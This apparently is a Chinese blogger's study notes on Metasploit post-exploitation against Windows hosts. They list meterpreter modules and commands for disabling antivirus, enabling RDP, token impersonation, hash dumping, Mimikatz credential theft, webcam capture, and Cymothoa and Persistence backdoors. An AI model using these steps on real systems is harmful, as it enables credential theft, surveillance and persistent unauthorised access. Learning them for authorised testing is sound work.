MSF学习第三天

Ps查看系统进程:
MSF学习第三天
自动进程迁移:post/windows/manage/migrate
MSF学习第三天
查看系统信息:sysinfo

MSF学习第三天
查看系统是否运行在虚拟机:post/windows/gather/checkvm
MSF学习第三天
查看系统最近运行时间:idletime
MSF学习第三天
查看完整网络设置:route
MSF学习第三天
Getuid:查看当前权限
MSF学习第三天
关闭杀毒软件:post/windows/manage/killav
MSF学习第三天
开启远程登录:post/windows/manage/enable_rdp
MSF学习第三天
MSF学习第三天
枚举登录用户:post/windows/gather/enum_logged_on_users
MSF学习第三天
列举已经安装的的应用:post/windows/gather/enum_applications
MSF学习第三天
查看是否设置自动登录,并抓取密码:
MSF学习第三天
Load espia :加载插件

Screengrab获取当前屏幕截屏:
MSF学习第三天
关于摄像头:webcam_list webcam_stream
MSF学习第三天
令牌假冒:
首先查看当前权限
MSF学习第三天
首先加载incognito模块:

MSF学习第三天
列出可用令牌:
MSF学习第三天
一共两类令牌:
Delegation Tokens:授权令牌,它支持交互登录
Impersonation Tokens:模拟令牌,是非交互的会话。
关于令牌数量最终取决于meterpreter shell的访问级别。(本例中采用管理员运行)
冒用令牌:
MSF学习第三天
注意hostname\username (中间要两个反斜杠)

Hash攻击:
Hashmap抓取密码:
Hashmap meterpreter脚本可以从目标机器中提取hash值,但是在非system权限下运行hashmap会失败,所以需要系统级的权限才能获取sam中的hash
MSF学习第三天

更加智能的smart_hashdump
MSF学习第三天
如果你是administrator用户,可以尝试通过getsystem命令获取系统级权限:
MSF学习第三天
成功读取到hash值

Mimikatz抓取密码:
对于mimikatz最佳试用32位系统,如果是64位系统,直接使用mimikatz之后meterpreter会加载一个32位的mimikatz到内存,使得很多功能无效。而且64位系统下必须查看进程列表然后在加载mimikatz之前将进程迁移到一个64位进程才能查看系统密码明文。
MSF学习第三天
是一个64位平台:
首先找一个64位进程:
MSF学习第三天
然后进程迁移:
MSF学习第三天
高权限迁低权限权限丢失了。。。。
重新获取shell,然后再重复上述步骤:
MSF学习第三天
MSF学习第三天
加载mimikatz模块,查看可用mimikatz全部模块:
MSF学习第三天

我们可以使用“::”语法请求某个模块的可用选项,选定一个模块后也可以用”::”查看本模块帮助:
查看hash模块的可用模块:
MSF学习第三天
我们知道mimikatz的用法之后可以使用metasploit内建的命令,也可以使用Mimikatz自带的命令从目标机器上导出hash和明文证书:
使用msv命令抓取系统hash:
MSF学习第三天
获取系统票据:kerberos
MSF学习第三天
Widgest可以获取系统账户信息:
MSF学习第三天
通过错误模块加载mimikatz可用模块:
MSF学习第三天查看samdump模块用法;MSF学习第三天Dump 全部hash值:MSF学习第三天MSF学习第三天
Mimikatz还可以通过service,process等其他模块操作系统服务,系统进程

后渗透测试之后门:
Cymothoa后门:可以将shellcode注入到现有进程的后门工具,反弹的是相应注入进程的权限,进程关闭后门关闭。
查看shellcode:

MSF学习第三天

需要把Cymothoa可执行程序复制到目标主机,然后通过命令:cymothoa -p pid -s 1 -y 4444注入shellcode
攻击机通过:nc -nvv 目标ip port 即可连接。

Persistence后门:自启动的持久性后门
查看帮助:
MSF学习第三天
创建后门:MSF学习第三天MSF学习第三天重新启动msf,会后门程序会自动重新发起连接:MSF学习第三天